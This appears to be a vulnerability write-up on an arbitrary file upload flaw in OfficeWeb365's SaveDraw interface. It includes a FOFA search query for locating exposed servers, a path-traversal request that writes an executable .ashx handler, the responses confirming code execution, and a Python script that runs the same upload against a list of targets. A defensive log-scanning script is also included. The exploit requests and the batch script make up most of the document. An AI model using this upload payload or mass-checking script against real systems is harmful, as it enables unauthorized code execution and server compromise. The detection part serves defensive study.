Disclaimer: this article is shared as study notes for technical learning and reference only. Do not use it for any illegal purpose. Any direct or indirect consequences or losses caused by any individual or organization using the information provided here are the sole responsibility of the user and have nothing to do with this platform or the publisher!!!

1. Vulnerability name

OfficeWeb365 SaveDraw arbitrary file upload vulnerability

2. Affected product

OfficeWeb365

3. Vulnerability description

The OfficeWeb365 SaveDraw interface has an arbitrary file upload vulnerability. Through it an attacker can upload arbitrary files to the server and obtain control of the server.

4. FOFA asset search query

"OfficeWeb365"

5. Vulnerability reproduction

Step 1: send the following request to the target. It computes the value of 44 * 41 and writes the computed result into the file drawPW10.ashx.


POST /PW/SaveDraw?path=../../Content/img&idx=10.ashx HTTP/1.1
Host: xx.xx.xx.xx:8088
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Content-Type: application/x-www-form-urlencoded

data:image/png;base64,{{filehash}}<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler
{
    public void ProcessRequest(System.Web.HttpContext context)
    {
        System.Web.HttpResponse response = context.Response;
        response.Write(44 * 41);

        string filePath = context.Server.MapPath("/") + context.Request.Path;
        if (System.IO.File.Exists(filePath))
        {
            System.IO.File.Delete(filePath);
        }
    }
    public bool IsReusable
    {
        get { return false; }
    }
}///---

The response is as follows; it indicates that the command was executed successfully.

HTTP/1.1 200 OK
Cache-Control: private
Vary: Accept-Encoding
X-Powered-By: OfficeWeb365
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Date: Thu, 07 Sep 2023 07:51:25 GMT

ok

Step 2: request the path http://xx.xx.xx.xx:8088/Content/img/UserDraw/drawPW10.ashx to view the file holding the execution result.


GET /Content/img/UserDraw/drawPW10.ashx HTTP/1.1
Host: xx.xx.xx.xx:8088
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

The response is as follows; the page contains the result of 44 * 41.

HTTP/1.1 200 OK
X-Powered-By: OfficeWeb365
Date: Thu, 07 Sep 2023 07:51:26 GMT
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5

1804

This proves that the vulnerability exists.
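As an added defensive example (not part of the original write-up), the following Python script flags the two request patterns shown above in IIS-style access logs: SaveDraw calls whose path parameter traverses directories or whose idx parameter carries a script extension, and requests for script files under the UserDraw upload directory. The log field order and the sample lines are constructed for this example, and the extension list beyond .ashx is an assumption.

```python
from urllib.parse import parse_qs, unquote

# Assumed field order of the constructed log lines below (a subset of the IIS W3C fields):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
FIELDS = ("date", "time", "c_ip", "method", "uri_stem", "uri_query", "status")

# Extensions IIS passes to a server-side handler instead of serving as static content.
# .ashx is the one in the write-up; the others are an assumption of this example.
SCRIPT_EXTS = (".ashx", ".aspx", ".asmx", ".asax", ".config")

def parse_line(line):
    """Split one log line into a dict; return None for comment or malformed lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def check_entry(entry):
    """Return the reasons a request looks like SaveDraw abuse (empty list if benign)."""
    reasons = []
    stem = unquote(entry["uri_stem"]).lower()
    raw_query = "" if entry["uri_query"] == "-" else unquote(entry["uri_query"])
    query = parse_qs(raw_query)
    if stem.endswith("/pw/savedraw"):
        path = query.get("path", [""])[0]
        idx = query.get("idx", [""])[0].lower()
        if ".." in path or "\\" in path:
            reasons.append("SaveDraw path parameter contains directory traversal")
        if idx.endswith(SCRIPT_EXTS):
            reasons.append("SaveDraw idx parameter carries a script extension")
    if "/userdraw/" in stem and stem.endswith(SCRIPT_EXTS):
        reasons.append("script file requested from the UserDraw upload directory")
    return reasons

def scan(lines):
    """Return (client ip, uri stem, reasons) for every suspicious request in the log."""
    hits = []
    for entry in filter(None, map(parse_line, lines)):
        reasons = check_entry(entry)
        if reasons:
            hits.append((entry["c_ip"], entry["uri_stem"], reasons))
    return hits

# Constructed sample log: the two requests from the write-up followed by two benign ones.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2023-09-07 07:51:25 203.0.113.5 POST /PW/SaveDraw path=../../Content/img&idx=10.ashx 200
2023-09-07 07:51:26 203.0.113.5 GET /Content/img/UserDraw/drawPW10.ashx - 200
2023-09-07 07:52:00 198.51.100.9 POST /PW/SaveDraw idx=3 200
2023-09-07 07:52:10 198.51.100.9 GET /Content/img/UserDraw/drawPW3.png - 200""".splitlines()

print(scan(SAMPLE_LOG))  # two hits, both from 203.0.113.5; the benign requests are not reported
```

Feed real W3C log lines through parse_line after adjusting FIELDS to the #Fields header of your own log.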

6. Vulnerability verification PoC

The following Python script checks targets in batch. C:\Users\DELL\Desktop\1006.txt is the input target file, with one URL per line.


import time
import requests


def get_url(file):
    # Read one target URL per line and check each of them in turn
    with open('{}'.format(file), 'r', encoding='utf-8') as f:
        for i in f:
            i = i.replace('\n', '')
            send_req(i)


def write_result(content):
    # Append a confirmed result to result.txt
    f = open("result.txt", "a", encoding="UTF-8")
    f.write('{}\n'.format(content))
    f.close()


def send_req(url_check):
    print('{} running check'.format(url_check))
    # Same SaveDraw request as in the reproduction section above
    url = url_check + '/PW/SaveDraw?path=../../Content/img&idx=10.ashx'
    header = {
        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',
        'Content-Type':'application/x-www-form-urlencoded'
    }
    data = (
        'data:image/png;base64,{{filehash}}<%@ Language="C#" Class="Handler1" %>public class\r\n'
        'Handler1:System.Web.IHttpHandler\r\n'
        '{\r\n'
        'public void ProcessRequest(System.Web.HttpContext context)\r\n'
        '{\r\n'
        'System.Web.HttpResponse response = context.Response;\r\n'
        'response.Write(44 * 41);\r\n'
        '\r\n'
        'string filePath = context.Server.MapPath("/") + context.Request.Path;\r\n'
        'if (System.IO.File.Exists(filePath))\r\n'
        '{\r\n'
        'System.IO.File.Delete(filePath);\r\n'
        '}\r\n'
        '}\r\n'
        'public bool IsReusable\r\n'
        '{\r\n'
        'get { return false; }\r\n'
        '}\r\n'
        '}///---\r\n'
    )

    try:
        requests.packages.urllib3.disable_warnings()
        response = requests.post(url=url, headers=header, data=data, verify=False, timeout=3)

        # Fetch the written file; a timeout is set so one unresponsive host cannot stall the batch
        url2 = "{}/Content/img/UserDraw/drawPW10.ashx".format(url_check)
        res2 = requests.get(url2, verify=False, timeout=3)

        # The written handler outputs 44 * 41 = 1804 when fetched
        if response.status_code == 200 and res2.status_code == 200 and '1804' in res2.text:
            result = '{} has the OfficeWeb365 SaveDraw arbitrary file upload vulnerability! Verify it yourself at: {} \n'.format(url_check, url2)
            print(result)
            write_result(result)
        time.sleep(1)
    except Exception as e:
        # Connection errors and timeouts are ignored so the batch run continues
        pass


if __name__ == '__main__':
    file = r"C:\Users\DELL\Desktop\1006.txt"
    get_url(file)